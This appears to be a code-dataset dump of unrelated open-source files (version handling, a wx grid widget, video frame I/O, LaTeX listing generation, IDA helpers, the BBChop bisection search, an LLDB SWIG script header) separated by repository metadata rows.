__assert_u16(ptr, ducky.hdt.HDTEntryTypes.MEMORY); ptr += sizeof(u16_t)
__assert_u16(ptr, sizeof(ducky.hdt.HDTEntry_Memory)); ptr += sizeof(u16_t)
__assert_u32(ptr, memory); ptr += sizeof(u32_t)
# CPU
__assert_u16(ptr, ducky.hdt.HDTEntryTypes.CPU); ptr += sizeof(u16_t)
__assert_u16(ptr, sizeof(ducky.hdt.HDTEntry_CPU)); ptr += sizeof(u16_t)
__assert_u16(ptr, cpus); ptr += sizeof(u16_t)
__assert_u16(ptr, cores); ptr += sizeof(u16_t)
| mit | 549,640,371,277,279,550 | 33.191781 | 204 | 0.665865 | false | 2.820339 | true | false | false |
mdrohmann/txtemplates | txtemplates/dist.py | 1 | 2685 | # encoding: utf-8
"""
Package for configuration of version numbers.
"""
class IncomparableVersions(TypeError):
"""
Two versions could not be compared.
"""
class Version(object):
def __init__(self, package, major, minor, patch, prerelease=None):
"""
Args:
package (str): Package name
major (int): Major version number
minor (int): Minor version number
patch (int): Patch number
Kwargs:
prerelease (str): pre-release specifier
"""
self.package = package
self.major = major
self.minor = minor
self.patch = patch
self.prerelease = prerelease
def short(self):
"""
Return a string in short version format,
<major>.<minor>
"""
return "{major}.{minor}".format(**self.__dict__)
def long(self):
"""
Return a string in version format,
<major>.<minor>.<patch>[-prerelease]
"""
s = "{major}.{minor}.{patch}".format(**self.__dict__)
if self.prerelease:
s = "{}-{}".format(s, self.prerelease)
return s
def __repr__(self):
return "[{}, version {}]".format(self.package, self.long())
def __str__(self):
return "[{}, version {}]".format(self.package, self.long())
def __cmp__(self, other):
"""
        Compare two versions, considering major versions, minor versions, patch
        versions, then prereleases.
A version with a prerelease is always less than a version without a
prerelease. All prerelease string are considered identical in value.
Args:
other (Version): Another version.
Returns:
one of -1, 0, or 1.
Raises:
- NotImplementedError: when the other version is not a Version
object
- IncomparableVersions: when the package names of the versions
differ.
"""
if not isinstance(other, self.__class__):
raise NotImplementedError
if self.package != other.package:
raise IncomparableVersions(
"{} != {}".format(self.package, other.package))
if self.prerelease:
pre = 0
else:
pre = 1
if other.prerelease:
otherpre = 0
else:
otherpre = 1
x = cmp(
(self.major,
self.minor,
self.patch,
pre),
(other.major,
other.minor,
other.patch,
otherpre))
return x
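# Illustrative usage (sketch, not part of the original module; relies on
# Python 2's cmp-based comparison used by __cmp__ above):
#   >>> a = Version("txtemplates", 1, 2, 0)
#   >>> b = Version("txtemplates", 1, 2, 0, prerelease="rc1")
#   >>> a.long(), b.long()
#   ('1.2.0', '1.2.0-rc1')
#   >>> a > b        # a release sorts after its own prerelease
#   True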
# vim:set ft=python sw=4 et spell spelllang=en:
| bsd-3-clause | -734,281,179,381,470,200 | 24.330189 | 79 | 0.52514 | false | 4.558574 | false | false | false |
eyeofhell/pyuser | pyuser/grid_wx.py | 1 | 1446 | #!/usr/bin/env python
# coding:utf-8 vi:et:ts=2
# PyUser grid widget for wxWidgets backend.
# Copyright 2013 Grigory Petrov
# See LICENSE for details.
import wx
from support_widget import Widget
import pyuser as pu
##c Grid layout, default for 2 columns (settings etc).
class Grid( Widget ):
def __init__( self, s_name = None, o_parent = 'auto', n_columns = 2 ):
Widget.__init__( self, s_name = s_name, o_parent = o_parent )
self._context_o = wx.FlexGridSizer( cols = n_columns )
self._columns_n = n_columns
## 0-based index of next column being added.
self._nextColumn_n = 0
## 0-based index of current row being added.
self._row_n = 0
def context( self ):
return self._context_o
##x Overloads |Widget|.
def dadd( self, o_widget ):
Widget.dadd( self, o_widget )
mCfg = { 'proportion': 0, 'item': o_widget }
if o_widget.grow().cx() and o_widget.grow().cy():
mCfg[ 'proportion' ] = 1
      mCfg[ 'flag' ] = wx.EXPAND
elif o_widget.grow().cx():
mCfg[ 'proportion' ] = 1
elif o_widget.grow().cy():
      mCfg[ 'flag' ] = wx.EXPAND
self.Add( ** mCfg )
self._nextColumn_n += 1
if self._nextColumn_n >= self._columns_n:
self._nextColumn_n = 0
self._row_n += 1
##x Overloads |Whoami|.
def isGrid( self ): return True
##x Overloads |Whoami|.
def isLayout( self ): return True
| gpl-3.0 | 1,094,700,796,064,712,600 | 23.821429 | 72 | 0.587828 | false | 3.157205 | false | false | false |
googleinterns/deep-stabilization | dvs/warp/read_write.py | 1 | 3803 | import numpy as np
import cv2
import os
from PIL import Image, ImageDraw, ImageFont
import matplotlib.pyplot as plt
import ffmpeg
import json
import torch
def load_video(path, save_dir = None, resize = None, length = -1): # N x H x W x C
vidcap = cv2.VideoCapture(path)
fps = vidcap.get(cv2.CAP_PROP_FPS)
success,image = vidcap.read()
print(image.shape)
height, width, layers = image.shape
if resize is None:
size = (width,height)
elif type(resize) is int:
size = (width//resize,height//resize)
else:
size = resize
count = 0
frames = []
while success:
if resize is not None:
image = cv2.resize(image, size, interpolation = cv2.INTER_LINEAR)
if save_dir != None:
path = os.path.join(save_dir, "frame_" + str(count).zfill(4) + ".png")
cv2.imwrite(path, image)
frames.append(image)
success,image = vidcap.read()
count += 1
if length > 0 and count >= length:
break
print("Video length: ", len(frames))
return frames, fps, size
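# Example call (sketch; the file name below is hypothetical):
#   frames, fps, size = load_video("clip.mp4", resize=2, length=100)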
def video2frame(path, resize = None):
data_name = sorted(os.listdir(path))
for i in range(len(data_name)):
print(str(i+1)+" / " + str(len(data_name)))
data_folder = os.path.join(path, data_name[i])
print(data_folder)
files = os.listdir(data_folder)
for f in files:
if f[-4:] == ".mp4":
video_name = f
video_path = os.path.join(data_folder, video_name)
frame_folder = os.path.join(data_folder, "frames")
if not os.path.exists(frame_folder):
os.makedirs(frame_folder)
load_video(video_path, save_dir = frame_folder, resize=resize)
def video2frame_one_seq(path, save_dir = None, resize = None): # N x H x W x C
vidcap = cv2.VideoCapture(path)
fps = vidcap.get(cv2.CAP_PROP_FPS)
success,image = vidcap.read()
print(path)
print(image.shape)
height, width, layers = image.shape
if resize is None:
size = (width,height)
elif type(resize) is int:
size = (width//resize,height//resize)
else:
size = resize
count = 0
while success:
if resize is not None:
image = cv2.resize(image, size, interpolation = cv2.INTER_LINEAR)
if save_dir != None:
path = os.path.join(save_dir, "frame_" + str(count).zfill(5) + ".png")
cv2.imwrite(path, image)
success,image = vidcap.read()
count += 1
return fps, size
def save_video(path,frame_array, fps, size, losses = None, frame_number = False, writer = None):
if writer is None:
if path[-3:] == "mp4":
out = cv2.VideoWriter(path,cv2.VideoWriter_fourcc(*'mp4v'), fps, size)
else:
out = cv2.VideoWriter(path,cv2.VideoWriter_fourcc('M','J','P','G'), fps, size)
else:
out = writer
for i in range(len(frame_array)):
# writing to a image array
if frame_number:
frame_array[i] = draw_number(np.asarray(frame_array[i]), i)
if losses is not None:
frame_array[i] = draw_number(np.asarray(frame_array[i]), losses[i], x = 900, message = "Loss: ")
out.write(frame_array[i])
if writer is None:
out.release()
def draw_number(frame, num, x = 10, y = 10, message = "Frame: "):
image=Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
draw = ImageDraw.Draw(image)
font = ImageFont.truetype("./data/arial.ttf", 45)
message = message + str(num)
color = 'rgb(0, 0, 0)' # black color
draw.text((x, y), message, fill=color, font=font)
return cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)
if __name__ == "__main__":
video2frame("./video", resize = 4) | apache-2.0 | 6,814,465,245,670,962,000 | 34.222222 | 108 | 0.58822 | false | 3.278448 | false | false | false |
RasmusWL/generate-lstlisting | outputter.py | 1 | 2053 | from classes import *
latexBegin = r'''
\newcommand{\includecodelang}[2]{\lstinputlisting[escapechar=, language=#2]{#1}}
\newcommand{\includecode}[1]{\lstinputlisting[escapechar=]{#1}}
'''
latexIncludeCode = "\\includecode{%s}"
latexIncludeCodeLang = "\\includecodelang{%s}{%s}"
latexFileHeading = "\\%s{%s\label{%s:%s}}"
latexFileHeadingNoLabel = "\\%s{%s}"
latexReplacements = {
'\t': '\\ ' * 4,
'&': '\\&',
'%': '\\%',
'$': '\\$',
'#': '\\#',
'_': '\\_',
'{': '\\{',
'}': '\\}',
'~': '\\textasciitilde ',
'^': '\\textasciicircum '
}
def escapeForLatex(text):
text = text.replace('\\', '\\textbackslash')
text = text.replace(' ', '\\ ')
text = text.replace('\\textbackslash', '\\textbackslash ')
for i, j in latexReplacements.items():
text = text.replace(i, j)
text = text.replace('"', '\char`\"{}')
return text
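# Illustrative behaviour (sketch, not part of the original module):
#   escapeForLatex("a_b 100%") yields the LaTeX text a\_b\ 100\%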
def output_start(out_file):
out_file.write(latexBegin)
def output(filename, rel_path, out_file):
out_file.write("%" * 80)
out_file.write("\n")
out_file.write("%% %s\n\n" % rel_path)
if settings.shouldAddLabel:
# apparently, no escape in labels
heading = latexFileHeading % (settings.headingStyle, escapeForLatex(rel_path), settings.labelPrefix, rel_path)
else:
heading = latexFileHeadingNoLabel % (settings.headingStyle, escapeForLatex(rel_path) )
out_file.write(heading)
out_file.write("\n")
language = None
for key in fileExtensionMap:
if filename.endswith(key):
language = fileExtensionMap[key]
break
if language is None:
include_line = latexIncludeCode % (filename)
else:
include_line = latexIncludeCodeLang % (filename, language)
out_file.write(include_line)
out_file.write("\n")
out_file.write("\n")
fileExtensionMap = {
'.erl' : 'erlang'
, '.hs' : 'Haskell'
, '.py' : 'Python'
, '.java' : 'Java'
, '.sh' : 'sh'
, '.bash' : 'bash'
, '.sml' : 'ML'
, '.sig' : 'ML'
}
| mit | 2,184,732,010,869,205,800 | 23.152941 | 118 | 0.566001 | false | 3.217868 | false | false | false |
rishubil/sqlalchemy-fulltext-search | setup.py | 1 | 1279 | """
SQLAlchemy FullText Search
"""
from setuptools import setup, Command
setup(
name='SQLAlchemy-FullText-Search',
version='0.2.3',
url='https://github.com/mengzhuo/sqlalchemy-fulltext-search',
license='BSD',
author='Meng Zhuo, Alejandro Mesa',
author_email='[email protected], [email protected]',
description=('Provide FullText for MYSQL & SQLAlchemy model'),
long_description = __doc__,
packages=['sqlalchemy_fulltext'],
zip_safe=False,
include_package_data=True,
platforms='any',
install_requires=['SQLAlchemy>=0.8',],
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules' ]
)
| mit | -265,112,061,610,332,200 | 38.96875 | 99 | 0.52932 | false | 4.702206 | false | false | false |
hazybluedot/manager_review | util.py | 1 | 1200 | def num_or_string(value):
try:
return float(value)
except ValueError:
return value
def num_or_none(fn, value):
try:
return fn(value)
except ValueError:
return None
def flatten_list(l):
return [ item for sublist in l for item in sublist ] # flatten list of lists
def issumable(thing):
try:
1.0 + thing
except TypeError:
return False
else:
return True
def label_to_attr(string):
return string.lower().replace(' ','_')
def levenshtein(s1, s2):
if len(s1) < len(s2):
return levenshtein(s2, s1)
# len(s1) >= len(s2)
if len(s2) == 0:
return len(s1)
previous_row = range(len(s2) + 1)
for i, c1 in enumerate(s1):
current_row = [i + 1]
for j, c2 in enumerate(s2):
insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer
deletions = current_row[j] + 1 # than s2
substitutions = previous_row[j] + (c1 != c2)
current_row.append(min(insertions, deletions, substitutions))
previous_row = current_row
return previous_row[-1]
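# Illustrative usage (sketch, not part of the original module):
#   levenshtein("kitten", "sitting")  ->  3
#   label_to_attr("Total Score")      ->  "total_score"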
| gpl-2.0 | 2,454,069,128,475,677,000 | 25.666667 | 127 | 0.5775 | false | 3.399433 | false | false | false |
OfficialMan/Sark | sark/data.py | 1 | 2198 | from collections import namedtuple
import idc
import idaapi
import itertools
import struct
from awesome.iterator import irange as range
from .core import fix_addresses
def Bytes(start=None, end=None):
start, end = fix_addresses(start, end)
return itertools.imap(idc.Byte, range(start, end))
def Words(start=None, end=None):
start, end = fix_addresses(start, end)
return itertools.imap(idc.Word, range(start, end, 2))
def Dwords(start=None, end=None):
start, end = fix_addresses(start, end)
return itertools.imap(idc.Dword, range(start, end, 4))
def Qwords(start=None, end=None):
start, end = fix_addresses(start, end)
return itertools.imap(idc.Qword, range(start, end, 4))
def bytes_until(byte=0, start=None, end=None):
return iter(Bytes(start, end).next, byte)
def words_until(word=0, start=None, end=None):
return iter(Words(start, end).next, word)
def dwords_until(dword=0, start=None, end=None):
return iter(Dwords(start, end).next, dword)
def Chars(start=None, end=None):
return itertools.imap(chr, Bytes(start, end))
def chars_until(char='\0', start=None, end=None):
return iter(Chars(start, end).next, char)
def read_ascii_string(ea, max_length=None):
if max_length is None:
end = None
else:
end = ea + max_length
return "".join(chars_until(start=ea, end=end))
def dword_to_bytes(dword):
return struct.pack(">L", dword)
def read_memory(start, end):
size = end - start
return idaapi.get_many_bytes(start, size)
def write_memory(start, data, destructive=False):
if destructive:
idaapi.put_many_bytes(start, data)
else:
idaapi.patch_many_bytes(start, data)
PatchedByte = namedtuple("PatchedByte", "ea fpos original patched")
def get_patched_bytes(start=None, end=None):
start, end = fix_addresses(start, end)
patched_bytes = dict()
def collector(ea, fpos, original, patched):
patched_bytes[ea] = PatchedByte(ea, fpos, original, patched)
return 0
idaapi.visit_patched_bytes(start, end, collector)
return patched_bytes
def undefine(start, end):
idc.MakeUnknown(start, end - start, idc.DOUNK_SIMPLE) | mit | 8,412,659,711,819,700,000 | 21.438776 | 68 | 0.682439 | false | 3.131054 | false | false | false |
ri23/FISHmodel | 3Dseg.py | 1 | 6210 | """Segment 3D tissue without cell walls."""
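# Command-line usage (sketch; the stack file name below is hypothetical):
#   python 3Dseg.py my_stack.tif --cell-level-threshold 0.3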
import os
import argparse
import numpy as np
import scipy.ndimage
import scipy.misc
from scipy.ndimage.filters import laplace
from skimage.exposure import equalize_hist
from skimage.filters import gaussian_filter
from skimage.measure import label
from skimage.morphology import watershed, remove_small_objects
from jicbioimage.core.io import FileBackend
from jicbioimage.core.image import DataManager
from jicbioimage.core.image import SegmentedImage
from jicbioimage.transform import (
max_intensity_projection
)
from jicbioimage.illustrate import AnnotatedImage
HERE = os.path.dirname(__file__)
UNPACK = os.path.join(HERE, '..', 'data', 'unpack')
OUTPUT = os.path.join(HERE, '..', 'output')#'/group-share','ietswaar','test','output')#HERE, '..', 'output') RI edit 1
if not os.path.isdir(OUTPUT):
os.mkdir(OUTPUT)
DEBUG = False
def collection_from_filename(stack_filename):
file_backend = FileBackend(UNPACK)
data_manager = DataManager(file_backend)
microscopy_collection = data_manager.load(stack_filename)
return microscopy_collection
def save_sample(filename, stack, sample_z=25):
full_path = os.path.join(OUTPUT, filename)
if DEBUG:
scipy.misc.imsave(full_path, stack[:,:,sample_z])
def save_stack(stack, stack_name='stack'):
if not DEBUG:
return
stack_dir = os.path.join(OUTPUT, stack_name + '.stack')
if not os.path.isdir(stack_dir):
os.mkdir(stack_dir)
xdim, ydim, zdim = stack.shape
for z in range(zdim):
filename = 'z{}.png'.format(z)
full_name = os.path.join(stack_dir, filename)
scipy.misc.imsave(full_name, stack[:,:,z])
def blank_layers(input_array, n_layers=2, blank=1):
"""Return a copy of the input array with the top and bottom
n_layers set to a particular value."""
_, _, zdim = input_array.shape
start_z = n_layers
stop_z = zdim - n_layers
blanked = input_array.copy()
blanked[:,:,0:start_z] = blank
blanked[:,:,stop_z:] = blank
return blanked
def find_seeds(zstack):
"""Return array containing segmentation seeds."""
smooth_sigma = 10
seed_threshold = 0.13
    min_size = 40000  # 10000 RI edit 5
xdim, ydim, zdim = zstack.shape
save_sample('start.png', zstack)
smoothed = gaussian_filter(zstack, sigma=smooth_sigma)
save_sample('smoothed.png', smoothed)
edges = laplace(smoothed)
edges = edges + np.min(edges)
save_sample('laplace.png', edges)
equalised = equalize_hist(edges)
save_sample('equalised.png', equalised)
blanked = blank_layers(equalised)
thresholded = blanked < seed_threshold
save_sample('thresholded.png', thresholded)
save_stack(thresholded, 'thresh')
connected = label(thresholded)
save_sample('connected.png', connected)
save_stack(connected, 'connected')
#rids = np.unique(connected)
#print [len(np.where(connected==rid)[0]) for rid in rids[1:]]
filtered_connected = remove_small_objects(connected, min_size=min_size)
save_stack(filtered_connected, 'filtered_connected')
return filtered_connected
def segment_from_seeds(zstack, seeds, watershed_cutoff):
    smooth_sigma = 5  # 15 RI edit 4
size_threshold = 10000
smoothed2 = scipy.ndimage.filters.gaussian_filter(zstack,
sigma=smooth_sigma)
save_sample('smoothed2.png', smoothed2)
inverted = np.max(smoothed2) - smoothed2
save_sample('inverted.png', inverted)
# Now normalised
equalised2 = equalize_hist(inverted)
save_sample('equalised2.png', equalised2)
save_stack(equalised2, 'equalised')
mask = equalised2 < watershed_cutoff
save_sample('mask.png', mask)
segmented = watershed(equalised2, seeds, mask=mask)
save_sample('segmented.png', segmented)
save_stack(segmented, 'segmented')
# region_ids = np.unique(segmented)
# sizes = [len(np.where(segmented == rid)[0]) for rid in region_ids]
nosmall = remove_small_objects(segmented, min_size=size_threshold)
save_stack(nosmall, 'nosmall')
reseg = watershed(equalised2, nosmall, mask=mask)
save_stack(reseg, 'reseg')
return reseg
def uint8ify(input_array):
max_val = float(np.max(input_array))
min_val = float(np.min(input_array))
val_range = max_val - min_val
return 255 * ((input_array.astype(np.float) - min_val) / val_range)
def generate_annotated_image(collection, cell_level_threshold):
zstack = collection.zstack_array(s=0, c=2)
probe_stack = collection.zstack_array(s=0, c=0)
max_intensity_projection(probe_stack)
seeds = find_seeds(zstack)
#probe_stack2 = collection.zstack_array(s=0, c=1) #RI edit 2
zstack = zstack + probe_stack #+ probe_stack2#RI edit 3
segmentation = segment_from_seeds(zstack, seeds, cell_level_threshold)
projection = max_intensity_projection(zstack)
projection_as_uint8 = uint8ify(projection)
annotated_projection = AnnotatedImage.from_grayscale(projection_as_uint8)
rids = np.unique(segmentation)
for rid in rids[1:]:
x, y, z = map(np.mean, np.where(segmentation == rid))
size = len(np.where(segmentation == rid)[0])
annotated_projection.text_at(str(size), y-10, x)
annotation_filename = 'annotated_image.png'
with open(annotation_filename, 'wb') as f:
f.write(annotated_projection.png())
def main():
global DEBUG
parser = argparse.ArgumentParser(__doc__)
parser.add_argument('image_filename', help="Image filename")
parser.add_argument('--cell-level-threshold',
type=float,
default=0.3,
help="Threshold (in range 0 < t < 1) defining cell")
parser.add_argument('--verbose',
type=bool,
default=False,
help="Whether processing stages should be output")
args = parser.parse_args()
DEBUG = args.verbose
collection = collection_from_filename(args.image_filename)
generate_annotated_image(collection, args.cell_level_threshold)
if __name__ == "__main__":
main()
| mit | -6,816,007,855,000,496,000 | 27.356164 | 118 | 0.663768 | false | 3.430939 | false | false | false |
petebachant/actuatorLine-2D-turbinesFoam | plot.py | 1 | 1090 | #!/usr/bin/env python
"""
This script plots results from `paramsweep.py`.
"""
from __future__ import division, print_function
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import os
import seaborn as sns
U_infty = 1.0
if __name__ == "__main__":
sns.set(style="white", context="paper", font_scale=1.5,
rc={"axes.grid": True, "legend.frameon": True})
df = pd.read_csv("processed/alpha_sweep.csv")
fig, (ax1, ax2) = plt.subplots(nrows=1, ncols=2, figsize=(7.5, 3))
ax1.plot(df.alpha_geom_deg, df.alpha_deg, "o", label="Detected")
ax1.plot(df.alpha_geom_deg, df.alpha_geom_deg, "--", label="Geometric")
ax1.set_xlabel(r"$\alpha$ (geometric, degrees)")
ax1.set_ylabel(r"$\alpha$ (detected, degrees)")
ax1.legend(loc="lower right")
ax2.plot(df.alpha_deg, df.rel_vel_mag, "o", label="Detected")
ax2.plot(df.alpha_geom_deg, np.ones(len(df)), "--", label="Geometric",
lw=2)
ax2.set_xlabel(r"$\alpha$ (detected, degrees)")
ax2.set_ylabel(r"$|U_\mathrm{rel}|$")
fig.tight_layout()
plt.show()
| mit | -2,037,779,283,774,665,700 | 34.16129 | 75 | 0.631193 | false | 2.809278 | false | true | false |
unapiedra/BBChop | BBChop/BBChop.py | 1 | 6208 | # Copyright 2008 Ealdwulf Wuffinga
# This file is part of BBChop.
#
# BBChop is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# BBChop is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with BBChop. If not, see <http://www.gnu.org/licenses/>.
from .listUtils import *
from .evidence import entropiesFast
from . import numberType
import copy
from . import skipProbability
#import plot
debug=False
#debug=True
############ ABBREVIATIONS
#
#
# E : Evidence
# L : Location
# d : number of detections at location
# t : number of non-detections at location
#
#
#strategies
# greedy strategy: always choose the location where the expected gain in entropy
# for the next observation is highest, i.e., the expected entropy after the
# next observation is smallest.
def greedyStrat(counts,locPrior,likelihoodsObj,dag,skipProbs):
(currEntropy,entropyResults,findProbs)=entropiesFast(counts,locPrior,likelihoodsObj,dag)
# test where expected entropy is smallest
expectedGain = [(currEntropy-entropyResults[i])*(numberType.one-skipProbs[i]) for
i in range(len(entropyResults))]
(next,nextp)=findMax(expectedGain)
return next
# nearly greedy strategy: like greedy, but if we have a detection, see if observing there again
# would be expected to improve next gain in entropy.
def nearlyGreedyStrat(counts,locPrior,likelihoodsObj,dag,skipProbs):
dlocs=[i for i in range(len(counts)) if counts[i][1]]
(currEntropy,entropyResults,findProbs)=entropiesFast(counts,locPrior,likelihoodsObj,dag)
(next,nextE)=findMin(entropyResults)
if len(dlocs):
# if there is a detection, calculate the expected entropy after making another observation
# there and then making a 'greedy' observation.
dloc=dlocs[-1]
(t,d)=counts[dloc]
dcounts=copy.copy(counts)
tcounts=copy.copy(counts)
dcounts[dloc]=(t,d+1)
tcounts[dloc]=(t+1,d)
(currEntropyD,entropyResultsD,findProbsD)=entropiesFast(dcounts,locPrior,likelihoodsObj,dag)
(currEntropyT,entropyResultsT,findProbsT)=entropiesFast(tcounts,locPrior,likelihoodsObj,dag)
(nextD,nextED)=findMin(entropyResultsD)
(nextT,nextET)=findMin(entropyResultsT)
expectedEntropy=findProbs[dloc]*nextED+(1-findProbs[dloc])*nextET
# print "c %1.2f n %1.02f c-n %1.04f c-e %1.04f fp %1.02f nf %1.02f nt %1.02f" %(currEntropy,nextE,currEntropy-nextE,currEntropy-expectedEntropy,findProbs[dloc],nextED,nextET)
if (currEntropy-nextE)<(currEntropy-expectedEntropy)/2.0:
return dloc
else:
return next
else:
return next
class BBChop:
def __init__(self,
locPrior,
certainty,
interactor,
likelihoodsObj,
dag,
strategy=greedyStrat,
skipProbsFunc=skipProbability.skipProbsSimple):
self.locPrior=numberType.copyList(locPrior)
self.certainty=numberType.const(certainty)
self.counts=[(0,0) for p in locPrior]
self.skipProbsFunc=skipProbsFunc
self.skipped=[False for p in locPrior]
self.dag=dag
self.skipProbs = self.skipProbsFunc(self.skipped,self.dag)
self.interactor=interactor
self.total=0
self.likelihoodsObj=likelihoodsObj
self.strategy=strategy
def addPriorKnowlege(self,knowlege):
(positives,negatives)=knowlege
(t,d)=self.counts[-1]
t+=negatives
d+=positives
self.counts[-1]=(t,d)
def addResult(self,location,observation):
(t,d)=self.counts[location]
# 'None' means we've decided that this location is invalid (eg, won't compile)
if observation is None:
self.skipped[location]=True
# set prior to zero because otherwise termination probability
# cannot always be achieved. This means that
# the probabilities we calculate are conditional on the bug not being located
# at a skipped location.
self.locPrior[location]=numberType.zero
self.skipProbs = self.skipProbsFunc(self.skipped,self.dag)
elif observation is True:
self.counts[location]=(t,d+1)
else:
self.counts[location]=(t+1,d)
if debug:
print(("ct",self.counts))
def search(self):
(locProbs,evProb)=self.likelihoodsObj.probs(self.counts,self.locPrior,self.dag)
(whereabouts,maxp) = findMax(locProbs)
if debug:
print("lp",list(map(float,locProbs)))
print("ct",self.counts)
while(maxp<self.certainty):
#decide where to seach next
self.interactor.statusCallback(False,whereabouts,maxp,locProbs,self.counts)
next=self.strategy(self.counts,
self.locPrior,
self.likelihoodsObj,
self.dag,
self.skipProbs)
observation=self.interactor.test(next)
self.total+=1
# update evidence
self.addResult(next,observation)
(locProbs,evProb)=self.likelihoodsObj.probs(self.counts,self.locPrior,self.dag)
print(locProbs)
if debug:
print("lp",list(map(float,locProbs)))
print("e",float(entropy(locProbs)),list(map(float,entropyResults)))
print("fp",list(map(float,findProbs)))
(whereabouts,maxp) = findMax(locProbs)
self.interactor.statusCallback(True,whereabouts,maxp,locProbs,self.counts)
return whereabouts
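# Illustrative wiring (sketch, not part of the original module; locPrior,
# interactor, likelihoodsObj and dag are assumed to implement the interfaces
# used by BBChop above and are not defined here):
#   searcher = BBChop(locPrior, 0.99, interactor, likelihoodsObj, dag,
#                     strategy=nearlyGreedyStrat)
#   whereabouts = searcher.search()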
| gpl-2.0 | -4,055,131,030,520,003,000 | 31.673684 | 182 | 0.643686 | false | 3.590515 | false | false | false |
fiji370/ostentatious-palaverer | bot_prototype 2.0/convert.py | 1 | 3005 | __all__ = ['convert']
# Don't look below, you will not understand this Python code :) I don't.
from js2py.pyjs import *
# setting scope
var = Scope( JS_BUILTINS )
set_global_object(var)
# Code follows:
var.registers([u'a', u'feach', u'g', u'checnum', u'n', u'Magnitude', u'text2num', u'Small'])
@Js
def PyJsHoisted_feach_(w, this, arguments, var=var):
var = Scope({u'this':this, u'arguments':arguments, u'w':w}, var)
var.registers([u'x', u'w'])
var.put(u'x', var.get(u'Small').get(var.get(u'w')))
if (var.get(u'x')!=var.get(u"null")):
var.put(u'g', (var.get(u'g')+var.get(u'x')))
else:
if (var.get(u'w')==Js(u'hundred')):
var.put(u'g', (var.get(u'g')*Js(100.0)))
else:
var.put(u'x', var.get(u'Magnitude').get(var.get(u'w')))
if (var.get(u'x')!=var.get(u"null")):
var.put(u'n', (var.get(u'n')+(var.get(u'g')*var.get(u'x'))))
var.put(u'g', Js(0.0))
else:
pass
PyJsHoisted_feach_.func_name = u'feach'
var.put(u'feach', PyJsHoisted_feach_)
@Js
def PyJsHoisted_checnum_(PyJsArg_6173_, this, arguments, var=var):
var = Scope({u'this':this, u'as':PyJsArg_6173_, u'arguments':arguments}, var)
var.registers([u'a', u'as'])
var.put(u'a', var.get(u'as').get(u'value'))
var.get(u'as').put(u'value', var.get(u'a').callprop(u'replace', JsRegExp(u'/[^\\d.]/g'), Js(u'')))
PyJsHoisted_checnum_.func_name = u'checnum'
var.put(u'checnum', PyJsHoisted_checnum_)
@Js
def PyJsHoisted_text2num_(s, this, arguments, var=var):
var = Scope({u'this':this, u's':s, u'arguments':arguments}, var)
var.registers([u's'])
var.put(u'a', var.get(u's').callprop(u'toString').callprop(u'split', JsRegExp(u'/[\\s-]+/')))
var.put(u'n', Js(0.0))
var.put(u'g', Js(0.0))
var.get(u'a').callprop(u'forEach', var.get(u'feach'))
return (var.get(u'n')+var.get(u'g'))
PyJsHoisted_text2num_.func_name = u'text2num'
var.put(u'text2num', PyJsHoisted_text2num_)
PyJs_Object_0_ = Js({u'zero':Js(0.0),u'one':Js(1.0),u'two':Js(2.0),u'three':Js(3.0),u'four':Js(4.0),u'five':Js(5.0),u'six':Js(6.0),u'seven':Js(7.0),u'eight':Js(8.0),u'nine':Js(9.0),u'ten':Js(10.0),u'eleven':Js(11.0),u'twelve':Js(12.0),u'thirteen':Js(13.0),u'fourteen':Js(14.0),u'fifteen':Js(15.0),u'sixteen':Js(16.0),u'seventeen':Js(17.0),u'eighteen':Js(18.0),u'nineteen':Js(19.0),u'twenty':Js(20.0),u'thirty':Js(30.0),u'forty':Js(40.0),u'fifty':Js(50.0),u'sixty':Js(60.0),u'seventy':Js(70.0),u'eighty':Js(80.0),u'ninety':Js(90.0)})
var.put(u'Small', PyJs_Object_0_)
PyJs_Object_1_ = Js({u'thousand':Js(1000.0),u'million':Js(1000000.0),u'billion':Js(1000000000.0),u'trillion':Js(1000000000000.0),u'quadrillion':Js(1000000000000000.0),u'quintillion':Js(1e+18),u'sexillion':Js(1e+21),u'septillion':Js(1e+24),u'octillion':Js(1e+27),u'nonillion':Js(1e+30),u'decillion':Js(1e+33)})
var.put(u'Magnitude', PyJs_Object_1_)
pass
pass
pass
pass
pass
pass
pass
# Add lib to the module scope
convert = var.to_python() | gpl-3.0 | 3,958,432,273,705,937,000 | 45.96875 | 532 | 0.610982 | false | 2.195033 | false | false | false |
llvm-mirror/lldb | scripts/Python/finishSwigPythonLLDB.py | 3 | 13786 | """ Python SWIG post process script for each language
--------------------------------------------------------------------------
File: finishSwigPythonLLDB.py
Overview: Python script(s) to post process SWIG Python C++ Script
Bridge wrapper code on the Windows/LINUX/OSX platform.
The Python scripts are equivalent to the shell script (.sh)
files.
For the Python script interpreter (external to liblldb) to
be able to import and use the lldb module, there must be
two files, lldb.py and _lldb.so, that it can find. lldb.py
is generated by SWIG at the same time it generates the C++
file. _lldb.so is actually a symlink file that points to
the LLDB shared library/framework.
The Python script interpreter needs to be able to
automatically find these two files. On Darwin systems it
searches in the LLDB.framework, as well as in all the normal
Python search paths. On non-Darwin systems these files will
need to be put some place where Python will find them.
This shell script creates the _lldb.so symlink in the
appropriate place, and copies the lldb.py (and
embedded_interpreter.py) file to the correct directory.
    Gotchas:    Python debug compiled pythonXX_d.lib is required for SWIG
to build correct LLDBWrapperPython.cpp in order for Visual
Studio to compile successfully. The release version of the
Python lib will not work (20/12/2013).
LLDB (dir) CMakeLists.txt uses windows environmental
variables $PYTHON_INCLUDE and $PYTHON_LIB to locate
Python files required for the build.
Copyright: None.
--------------------------------------------------------------------------
"""
# Python modules:
import os # Provide directory and file handling, determine OS information
import sys # System specific parameters and functions
import shutil # High-level operations on files and collections of files
import ctypes # Invoke Windows API for creating symlinks
# Third party modules:
